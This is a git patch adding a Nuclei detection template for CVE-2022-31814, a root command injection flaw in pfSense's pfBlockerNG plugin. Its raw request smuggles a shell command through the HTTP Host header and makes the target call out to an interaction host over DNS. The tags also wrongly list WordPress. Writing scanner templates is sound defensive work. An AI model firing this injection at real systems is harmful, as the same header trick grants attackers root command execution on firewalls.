From 13c101a0b50ae57456b578a281619cc91cacc714 Mon Sep 17 00:00:00 2001 From: EvergreenCartoons <113829980+EvergreenCartoons@users.noreply.github.com> Date: Mon, 19 Sep 2022 15:12:25 +0100 Subject: [PATCH] Create CVE-2022-31814.yaml --- cves/2022/CVE-2022-31814.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2022/CVE-2022-31814.yaml diff --git a/cves/2022/CVE-2022-31814.yaml b/cves/2022/CVE-2022-31814.yaml new file mode 100644 index 0000000000..6526449c9d --- /dev/null +++ b/cves/2022/CVE-2022-31814.yaml @@ -0,0 +1,32 @@ +id: CVE-2022-31814 +info: + name: pfSense pfblockerng plugin rce + author: EvergreenCartoons + severity: critical + description: | + pfSense pfBlockerNG through 2.1.4_26 allows remote attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected. + reference: + - https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ + - https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html + - https://github.com/EvergreenCartoons/SenselessViolence + - https://nvd.nist.gov/vuln/detail/CVE-2022-31814 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-31814 + tags: pfsense,cve,cve2022,rce,wordpress + +requests: + + - raw: + - |+ + GET /pfblockerng/www/index.php HTTP/1.1 + Host: ' *; host {{interactsh-url}}; ' + Accept: */* + unsafe: true + + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns"